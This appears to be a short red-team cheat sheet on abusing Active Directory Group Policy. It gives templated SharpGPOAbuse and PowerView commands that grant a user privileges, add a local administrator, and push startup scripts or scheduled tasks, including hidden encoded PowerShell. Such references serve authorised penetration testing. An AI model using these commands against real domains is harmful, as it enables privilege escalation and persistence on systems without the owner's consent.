Skip to main content

GPO

Force GPO update​

gpupdate /force

Create a GPO​

RSAT​

Create scheduled task

File to execute

GPO creator abuse​

SharpGPOAbuse.exe --AddUserRights --UserRights "<SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight,...>" --UserAccount <user> --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <user> --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddUserScript --ScriptName <StartupScript.bat> --ScriptContents "<CLI>" --GPOName "<GPO_name>"

SharpGPOAbuse.exe --AddComputerTask --TaskName "<task_name>" --Author <domain\user> --Command "<cmd.exe>" --Arguments "</c ...>"" --GPOName "<GPO_name>"

PowerView

New-GPOImmediateTask -TaskName <task_name> -GPODisplayName <GPO_name> -CommandArguments '<-NoP -NonI -W Hidden -Enc ...>' -Force